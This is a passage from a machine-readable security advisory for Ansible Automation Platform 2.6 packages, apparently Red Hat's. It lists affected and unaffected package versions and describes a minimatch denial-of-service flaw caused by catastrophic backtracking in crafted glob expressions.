"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
